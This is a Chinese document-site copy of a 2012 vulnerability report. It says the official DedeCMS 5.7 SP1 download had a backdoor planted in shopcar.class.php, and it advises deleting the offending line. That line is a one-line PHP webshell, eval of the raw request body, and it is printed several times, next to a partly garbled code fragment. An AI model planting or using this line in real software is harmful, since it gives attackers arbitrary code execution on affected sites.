- 0
- 0
- 约2.29千字
- 约 5页
- 2017-06-12 发布于北京
- 举报
dedecms 5.7 shopcar.class.php 被植入一句话 一句话后门利用漏洞详情
披露状态:
2012-03-20: 积极联系厂商并且等待厂商认领中,细节不对外公开2012-03-20: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
DedeCMS V5.7 SP1正式版UTF-8 GBK版本疑似被植入一句话后门前几日下载并不存在此代码
详细说明:
shopcar.class.php被植入一句话@eval(file_get_contents(php://input));
?
漏洞证明:
shopcar.class.php被植入一句话@eval(file_get_contents(php://input));
?
修复方案:
删除@eval(file_get_contents(php://input));?
shopcar.class.php 被植入一句话
?
@eval(file_get_contents(php://input));
去官网下了一套回来,看了下代码,
?
classMemberShops{var $OrdersId;var $productsId;function __construct(){ ? ? ? ?$this-OrdersId= $this-getCookie(OrdersId);if(empty($this-Order
您可能关注的文档
最近下载
- OTIS奧的斯西子奧的斯ACD4调试手册UCPM版本调试资料GECB调试ACD-MRL_SUR_ZH_20171225.pdf VIP
- 高二期末数学模拟试卷:数列导数排列组合分布列.pdf VIP
- 2025年大学《农业工程-农业机械学基础》考试参考题库及答案解析.docx VIP
- 智能建筑设计标准.doc VIP
- 20kV及以下配电网工程带电作业补充定额(试行)(1).pdf VIP
- 《颜氏家训》66条精华.docx VIP
- 小儿内科医学高级职称(副高)2025年真题及答案.docx VIP
- 电子科技大学中山学院答辩通用模板.pptx VIP
- 压缩热再生吸附式干燥机.ppt VIP
- 阿里云专有云基础云产品运维工程师ACP认证笔试试题.pdf
原创力文档

文档评论(0)